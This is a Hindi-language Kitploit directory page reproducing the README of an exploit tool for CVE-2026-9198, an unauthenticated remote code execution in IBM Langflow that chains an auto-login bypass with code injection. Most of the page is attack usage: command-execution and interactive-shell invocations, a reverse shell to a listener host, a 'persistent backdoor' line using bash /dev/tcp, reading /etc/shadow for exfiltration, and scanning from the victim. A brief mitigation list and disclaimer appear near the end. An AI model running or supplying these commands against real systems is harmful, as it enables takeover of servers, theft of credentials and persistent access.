Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2026-9198 — IBM Langflow में ऑटो-लॉगिन बाईपास के माध्यम से अनधिकृत RCE | Kitploit
उपकरण/GitHubGitHub/0xgh057r3c0n/cve-2026-9198
पेलोड जनरेशनशोषणवेब एप्लिकेशन शोषणकमांड एंड कंट्रोलप्रमाणीकरणरेड टीमिंगरिमोट एक्सेस टूल
GitHub0xgh057r3c0n/cve-2026-9198

CVE-2026-9198

IBM Langflow में ऑटो-लॉगिन बाईपास के माध्यम से अनधिकृत RCE

रिपॉजिटरी देखें
127 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें
Langflow लोगो

🚨 CVE-2026-9198

IBM Langflow OSS में ऑटो-लॉगिन बाईपास के माध्यम से अनधिकृत RCE

License: MIT Python 3.6+ Security


📋 अवलोकन

CVE-2026-9198 IBM Langflow OSS में एक गंभीर अनधिकृत रिमोट कोड निष्पादन (RCE) भेद्यता है। यह एक्सप्लॉइट दो भेद्यताओं को जोड़ता है:

  • CVE-2026-9103: ऑटो-लॉगिन बाईपास जो अनधिकृत कॉलर्स को सुपरयूज़र JWT टोकन प्रदान करता है
  • CVE-2026-8481: /api/v1/validate/code एंडपॉइंट में कोड इंजेक्शन जो मनमाना Python निष्पादन की अनुमति देता है

⚠️ चेतावनी: यह टूल केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। अनधिकृत उपयोग अवैध है।


🚀 विशेषताएँ

  • 🔓 ऑटो-लॉगिन बाईपास - स्वचालित रूप से सुपरयूज़र JWT टोकन प्राप्त करता है
  • 💻 इंटरैक्टिव स्यूडो-शेल - उपयोगकर्ता नाम और वर्तमान निर्देशिका के साथ डायनामिक प्रॉम्प्ट
  • 📝 एकल कमांड निष्पादन - मनमाने सिस्टम कमांड चलाएँ
  • 🔄 रिवर्स शेल - वन-लाइनर रिवर्स शेल पेलोड वितरण
  • 🎨 रंगीन आउटपुट - ANSI रंगों के साथ विज़ुअल फीडबैक
  • ⚡ तेज़ और विश्वसनीय - मजबूत त्रुटि प्रबंधन के साथ निर्मित

📦 इंस्टॉलेशन

आवश्यक शर्तें

  • Python 3.6 या उच्चतर
  • pip पैकेज मैनेजर

चरण 1: रिपॉजिटरी क्लोन करें

root@kitploit:~
git clone https://github.com/0xgh057r3c0n/CVE-2026-9198.git
cd CVE-2026-9198

चरण 2: निर्भरताएँ इंस्टॉल करें

root@kitploit:~
pip install termcolor

या सभी निर्भरताएँ एक साथ इंस्टॉल करें:

root@kitploit:~
pip install -r requirements.txt

चरण 3: इंस्टॉलेशन सत्यापित करें

root@kitploit:~
python CVE-2026-9198.py --help

आपको सभी उपलब्ध विकल्पों के साथ हेल्प मेनू देखना चाहिए।


🎯 उपयोग

बेसिक कमांड निष्पादन

लक्ष्य पर एक एकल कमांड निष्पादित करें:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -c "id"

उदाहरण:

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "whoami"

इंटरैक्टिव स्यूडो-शेल

डायनामिक प्रॉम्प्ट के साथ एक इंटरैक्टिव शेल लॉन्च करें:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --shell

विशेषताएँ:

  • डायनामिक प्रॉम्प्ट जो user@host और वर्तमान निर्देशिका दिखाता है
  • स्वचालित प्रॉम्प्ट अपडेट के साथ cd कमांड समर्थन
  • कमांड हिस्ट्री (टर्मिनल पर निर्भर)
  • स्वच्छ आउटपुट फ़ॉर्मेटिंग

उदाहरण सत्र:

root@kitploit:~
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ whoami
root
┌─[root@0xgh057r3c0n]─[~]
└──╼ $ cd /tmp
┌─[root@0xgh057r3c0n]─[/tmp]
└──╼ $ pwd
/tmp

रिवर्स शेल

लिसनर को रिवर्स शेल पेलोड भेजें:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --lhost <your_ip> --lport <port>

उदाहरण:

root@kitploit:~
# On your machine - Start listener
nc -lvnp 4444

# Then run the exploit
python CVE-2026-9198.py -t 192.168.1.100 --lhost 192.168.1.50 --lport 4444

कस्टम पोर्ट

यदि Langflow गैर-डिफ़ॉल्ट पोर्ट पर चल रहा है:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -p <port> -c "whoami"

उदाहरण:

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -p 8080 -c "ls -la"

पहले से प्राप्त टोकन का उपयोग करना

ऑटो-लॉगिन प्रक्रिया को छोड़ें और मौजूदा टोकन का उपयोग करें:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> -k <your_jwt_token> -c "id"

टाइमआउट कॉन्फ़िगरेशन

धीमे नेटवर्क के लिए HTTP टाइमआउट समायोजित करें:

root@kitploit:~
python CVE-2026-9198.py -t <target_ip> --timeout 30 -c "whoami"

📝 कमांड लाइन तर्क


🔧 उदाहरण

1. बेसिक जानकारी एकत्र करना

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "uname -a"

2. फ़ाइल सिस्टम अन्वेषण

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 --shell
# Then inside the shell:
ls -la
cat /etc/passwd

3. स्थायी बैकडोर

root@kitploit:~
# Create a reverse shell that persists
python CVE-2026-9198.py -t 192.168.1.100 -c "echo 'bash -i >& /dev/tcp/192.168.1.50/4444 0>&1' > /tmp/backdoor.sh && chmod +x /tmp/backdoor.sh && /tmp/backdoor.sh"

4. नेटवर्क स्कैनिंग (लक्ष्य से)

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "nmap -sP 192.168.1.0/24"

5. संवेदनशील फ़ाइलें एक्सफिल्ट्रेट करना

root@kitploit:~
python CVE-2026-9198.py -t 192.168.1.100 -c "cat /etc/shadow | base64"

🛡️ शमन

इस भेद्यता से सुरक्षा के लिए:

  1. प्रोडक्शन वातावरण में ऑटो-लॉगिन अक्षम करें
  2. IBM द्वारा Langflow के लिए जारी पैच लागू करें
  3. Langflow प्रशासनिक इंटरफेस तक नेटवर्क एक्सेस प्रतिबंधित करें
  4. /api/v1/auto_login और /api/v1/validate/code पर असामान्य API अनुरोधों की निगरानी करें
  5. संदिग्ध पेलोड पैटर्न को ब्लॉक करने के लिए WAF नियमों का उपयोग करें

⚠️ अस्वीकरण

यह टूल केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है। लेखक इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए ज़िम्मेदार नहीं है। उपयोगकर्ता लागू कानूनों और विनियमों का पालन करने के लिए पूरी तरह ज़िम्मेदार हैं।


📄 लाइसेंस

यह प्रोजेक्ट MIT लाइसेंस के अंतर्गत लाइसेंस प्राप्त है - विवरण के लिए LICENSE फ़ाइल देखें।


👨‍💻 लेखक

0xgh057r3c0n

  • GitHub: @0xgh057r3c0n
  • सुरक्षा शोधकर्ता और पेंटेस्टर

📚 संदर्भ

  • CVE-2026-9198 विवरण
  • CVE-2026-9103 - ऑटो-लॉगिन बाईपास
  • CVE-2026-8481 - कोड इंजेक्शन
  • Langflow आधिकारिक साइट

🤝 योगदान

योगदान का स्वागत है! कृपया बेझिझक पुल रिक्वेस्ट सबमिट करें।

  1. रिपॉजिटरी फोर्क करें
  2. अपनी फीचर ब्रांच बनाएँ (git checkout -b feature/AmazingFeature)
  3. अपने बदलाव कमिट करें (git commit -m 'Add some AmazingFeature')
  4. ब्रांच पर पुश करें (git push origin feature/AmazingFeature)
  5. पुल रिक्वेस्ट खोलें

⭐ स्टार हिस्ट्री

यदि आपको यह टूल उपयोगी लगता है, तो कृपया इसे GitHub पर ⭐ देने पर विचार करें!


0xgh057r3c0n द्वारा ❤️ से निर्मित
टूल डाउनलोड करें
तर्कविवरणआवश्यकडिफ़ॉल्ट
-t, --targetलक्ष्य होस्ट/IP या पूर्ण URL✅ हाँ-
-p, --portLangflow पोर्ट❌ नहीं7860
-c, --cmdएक एकल कमांड निष्पादित करें❌ नहीं"id"
--shellइंटरैक्टिव स्यूडो-शेल मोड❌ नहींFalse
--lhostरिवर्स शेल लिसनर IP❌ नहीं-
--lportरिवर्स शेल लिसनर पोर्ट❌ नहीं4444
-k, --tokenदिए गए बियरर टोकन का उपयोग करें❌ नहीं-
--timeoutसेकंड में HTTP टाइमआउट❌ नहीं20
--no-bannerबैनर छिपाएँ❌ नहींFalse